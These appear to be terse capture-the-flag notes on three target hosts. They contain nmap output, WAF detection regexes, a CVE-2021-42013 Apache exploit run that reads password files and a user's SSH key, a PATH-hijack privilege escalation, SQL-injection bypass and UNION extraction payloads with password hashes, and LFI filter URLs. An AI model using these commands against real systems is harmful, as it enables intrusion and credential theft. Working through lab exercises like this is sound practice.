# inno
# wafy waf
http://84.252.135.107/
Shop
```
22/tcp open ssh syn-ack ttl 57 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4a:71:ea:d0:83:d3:ce:e4:3e:9a:9b:43:b3:07:a0:6f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCufHuPN6xUdmPa0tql0+WxNedRwn2+80zLRQY3ii7POLeAA/qLaC85hhaB5fVruEVthEgVNfZKMlsMfZbC3jBdn2347227vuByOVO6BlYDGwK2g+kHM0DyOde7pViQNittZoHl3TMSqke7KQuG21uOC9pL+q13Zo0hBZffGwtJhqX7FFgKXbc3G8ek5/Km8Z4y3BmaGByYrAE4giC1X9u7t1eTI2TGU9ww8ZIMwtiUZjpihK/6Tb3USUZhlYw4MIKpyhdLh1vlPL2jM/LzP3gFe1jpGYYISNjfEXJDGahriB7SIqklYeI98phiKuFyDHFeQ2yVwLSh02lDSQQ8FjId8VFVcFcWc/f0WyhifKfi+GIc5k/KbzEQMRiQbEQhRrYZJs/C7ZZfH46Rax2WLE1XP1fWnjYKOoJPqRE2WefYpxTFtfHFLgkORWJHKpSeXtIycBK3IQPHvXwOKBubmjJnV1NgFLY2thy/ccCMaCFHQjFaGvUCNB+IYPZHQyVuIj0=
| 256 4c:13:e1:27:d4:ed:51:be:56:6e:81:f6:83:11:1e:ef (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLb7V8ujkvemFvWDJXmr98lfWXwgHhv2vSXsXxWxw9jmP1CFgq2vxc3FtpFkddP4/YBGK1sCeIgSg1aH/K6MjZs=
| 256 64:0e:b7:0e:0e:3f:a7:d1:7e:93:a1:4c:a4:36:0e:a7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILmsmQYU6igWqIfUiqqb9WEx4XJ1TWzCRfb3hm4MBUQS
25/tcp filtered smtp no-response
80/tcp open http syn-ack ttl 57 nginx 1.21.3
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.21.3
| http-title: Wafy WAF
|_Requested resource was /login
```
## WAF executable
url: http://84.252.135.107/download/55
XSS regex: ```.*<(([sS][cC][rR][iI][pP][tT])|([iI][mM][gG]))(.*)/?>.*```
SQL injection regex: ```.*(['\\\";]+)(([aA][lL][tT][eE][rR]((\\s)|(/\\*\\*/))+[tT][aA][bB][lL][eE])|([cC][rR][eE][aA][tT][eE]((\\s)|(/\\*\\*/))+[tT][aA][bB][lL][eE])|([cC][rR][eE][aA][tT][eE]((\\s)|(/\\*\\*/))+[dD][aA][tT][aA][bB][aA][sS][eE])|([dD][eE][lL][eE][tT][eE]((\\s)|(/\\*\\*/))+[tT][aA][bB][lL][eE])|([dD][rR][oO][pP]((\\s)|(/\\*\\*/))+[tT][aA][bB][lL][eE])|([dD][rR][oO][pP]((\\s)|(/\\*\\*/))+[dD][aA][tT][aA][bB][aA][sS][eE])|([iI][nN][sS][eE][rR][tT]((\\s)|(/\\*\\*/))+[iI][nN][tT][oO])|([sS][eE][lL][eE][cC][tT]((\\s)|(/\\*\\*/))+((\\*)|[\\w_-]+)((\\s)|(/\\*\\*/))+[fF][rR][oO][mM])|([uU][pP][dD][aA][tT][eE]((\\s)|(/\\*\\*/))+[tT][aA][bB][lL][eE])|([uU][nN][iI][oO][nN]((\\s)|(/\\*\\*/))+[sS][eE][lL][eE][cC][tT])).*```
# simple band
http://130.193.35.203/
```
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 9c:c7:ff:c4:06:58:96:5e:ff:ca:49:b3:b8:65:4e:57 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDDNDEJMp8IKt7/jZPgegwNdEJkPrzPpHsb2oZaWljOaODMDCT7x4GnQIf7HxUoojLLOmyZ8L1h9TruY/ByQcE3ptdioYp2+b5qYL75e1OHg2PAzehx5snrk97UrjEjjlUsj4dAFHNcTYYNsJlLtSlKSK2QYpwrKE/wNpDHNWAnfTSwhzySg5dpIZqgppI66wihd9etIZkfVA8qYmGNb5nlemc6ziKFu6G6QAG65V1lOjeDx7b62Czr7M15gXl5PVXqWxRIQB5UdIlDyUgbvfEgRzwIvy/T5JE7KdHvB98IyP/7UfRPdkea3edM7eMfS1X8ivRFiR3SxZ6f7qLpfoBbmAakxRJVLJCzwu7IhCc8OmfVgTjwEDgaFC7g4FaKPkE/CFoP7+GZ34k1Wsf8kXKV/AFAI19MxvEeHc57/6/YVK8QJcuMjIWw4BWSIOT34EMSbS4sbIDodu7Pot8g1Ryf54wNKSo9auMumYJVKL/kXCuBtmgeX9kIcUWSr0j7HeM=
| 256 8f:9d:ab:33:11:ec:b4:29:52:d4:32:75:8c:d5:71:c3 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEIVlHtUnwzPI+Ru1PlnnWZJqc+MRDuDa9kbIVnSWbrYudKu0wQ/bV8/BYxgMZKAyE9w0R243rjnn7z0ttlpGfU=
| 256 80:1a:98:f4:55:94:e9:0f:2b:b0:14:13:db:26:5f:2e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDsf7re6oC3xRDSR/hED/lwfo6U+kE00/+n2IkvzrY8J
25/tcp filtered smtp no-response
80/tcp open http syn-ack Apache httpd 2.4.50 ((Unix))
|_http-title: Simple Band
| http-methods:
| Supported Methods: GET POST OPTIONS HEAD TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.50 (Unix)
2222/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 47:2f:63:46:23:6f:61:a5:41:7b:40:95:e7:48:eb:ca (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC+moNECS8pz9RyK18FS18twouR3EG0wvCthqdRMVRvfuCQA8rZWaA6j0K779mxdkzxTfHkZUaF9XACGUOdhPRE1uBoLwB46dmbVokMvArkODmyRaCoG3XVowAZOg6KIlYf4XM+2xicbtUx90mBsSRiZu3fkOXw/JkY/EWq/kekuN562PdERVKltT6p+qquh940KGHdfnjByrrkCmzZI2FO3J8f7kv5H9RCMA5uL+WU1N/PHq4DNZxGRHSdnqTuBQ8DJq8AZvnIuwxKQBGGHoea1UnFH3f1q+DS3HxK3kbP5VCPm/jRwz2BQPjuUTyFDvhzf1xUEiOYVWENP47bMP2j
| 256 05:87:f5:65:a4:b5:6d:d0:4b:3f:70:0a:78:5e:36:8d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBE88xTYaNpE1tFGoarc+AQLTqb4b4lQZ4H2yFIQAO45U1cOA+y4YMb8IcczPFZY3nYWJXCBYX9B1e7OxIyGxUQg=
| 256 0a:d0:46:ff:a3:be:56:9c:d5:ec:59:42:25:e1:6c:a2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKB/yrP/d4DMrb+D3HgyRJGpn4cMiK3IR1m1ZCNECtE2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
```
/.htpasswd (Status: 403) [Size: 199]
/.hta (Status: 403) [Size: 199]
/.htaccess (Status: 403) [Size: 199]
/cgi-bin/ (Status: 403) [Size: 199]
/dev (Status: 401) [Size: 381]
/index.html (Status: 200) [Size: 11577]
```
http://130.193.35.203/dev - Auth
CVE-2021-42013
```
PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:105::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
unclejoe:x:1000:1000::/home/unclejoe:/bin/sh
```
cat /usr/local/apache2/conf/.htpasswd
unclejoe:$apr1$2iMRKD/X$JwtAnrb3xDIh/2gEwnxUy/
unclejoe:prettyprincess
bash 50446.sh http://130.193.35.203/ 'echo prettyprincess | su - unclejoe -c "whoami"'
bash 50446.sh http://130.193.35.203/ 'echo prettyprincess | su - unclejoe -c "echo '' | ssh-keygen" 2>&1'
bash 50446.sh http://130.193.35.203/ 'echo prettyprincess | su - unclejoe -c "cat ~/.ssh/id_rsa"'
## Privesc
bash 50446.sh http://130.193.35.203/ 'echo prettyprincess | su - unclejoe -c "cat /usr/bin/info | base64" 2>&1'
bash 50446.sh http://130.193.35.203/ 'echo prettyprincess | su - unclejoe -c "echo IyEvYmluL2Jhc2gKCmJhc2U2NCAvcm9vdC9yb290LnR4dAo= | base64 -d > /tmp/cat" 2>&1'
bash 50446.sh http://130.193.35.203/ 'echo prettyprincess | su - unclejoe -c "PATH=/tmp/:$PATH /usr/bin/info" 2>&1'
bash 50446.sh http://130.193.35.203/ 'echo prettyprincess | su - unclejoe -c "chmod +x /tmp/cat" 2>&1'
# Issue Tracker
http://130.193.46.68/
## nmap
```
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
53/tcp closed domain conn-refused
9000/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
## SQL injection
login: admin' or 1=1-- -
pass: 123123
## User info
http://130.193.46.68:9000/manage_user.php?id=2
http://130.193.46.68:9000/manage_user.php?id=2%27%20or%201=1--%20-
Injection
http://130.193.46.68:9000/manage_user.php?id=22%27%20union%20select%201,sqlite_version(),3,4,5,6,7,8,9,10,11--%20-
db - sqlite 3.31.1
http://130.193.46.68:9000/manage_user.php?id=22%27%20union%20select%201,tbl_name,3,4,5,6,7,8,9,10,11%20FROM%20sqlite_master%20WHERE%20type=%27table%27%20and%20tbl_name%20NOT%20like%20%27sqlite_%25%27--%20-
tables: department_list,user_list,issue_list,comment_list
user list:
```
CREATE TABLE user_list ( `user_id` INTEGER PRIMARY KEY AUTOINCREMENT, `fullname` TEXT NOT NULL, `email` TEXT NOT NULL, `contact` TEXT NOT NULL, `username` TEXT NOT NULL, `password` TEXT NOT NULL, `department_id` INTEGER, `type` INTEGER, `designation` TEXT NOT NULL, `date_created` TIMESTAMP DEFAULT CURRENT_TIMESTAMP )
```
admin,jsmith,cblake,rdennyel
39b46c5fd3bf8e3fd1fdef4c11865f76,77732c5dfb225a78a70986225f00446d,cd74fae0a3adf459f73bbf187607ccea,ab137b505694d419458bdc80f62496cf
cblake - cblake
rdennyel - rdennyel
## Possible LFI
http://130.193.46.68:9000/?page=users.php%00
http://130.193.46.68:9000/?page=users
## urls
url|note
--|--
http://130.193.46.68:9000/login.php|login
http://130.193.46.68:9000/db|probably DB, Forbidden
http://130.193.46.68:9000/Actions.php?a=\<action\>|actions, for example login
http://130.193.46.68:9000/home.php
http://130.193.46.68:9000/users.php
http://130.193.46.68:9000/depratment.php
http://130.193.46.68:9000/tickets.php
http://130.193.46.68:9000/issues.php
http://130.193.46.68:9000/index.php
http://130.193.46.68:9000/home.php
http://130.193.46.68:9000/db/issue_tracker_db.db
## logins
login|password|url
--|--|--
rdennyel|9a16a1ccef71ff4af0dbe179f1af09db|http://130.193.46.68:9000/?page=view_issue&id=8f14e45fceea167a5a36dedd4bea2543
## A
http://130.193.46.68:9000/?page=php://filter/convert.base64-encode/resource=index
http://130.193.46.68:9000/?page=php://filter/convert.base64-encode/resource=/var/www/html/index
Sign in with Wallet
Connect another wallet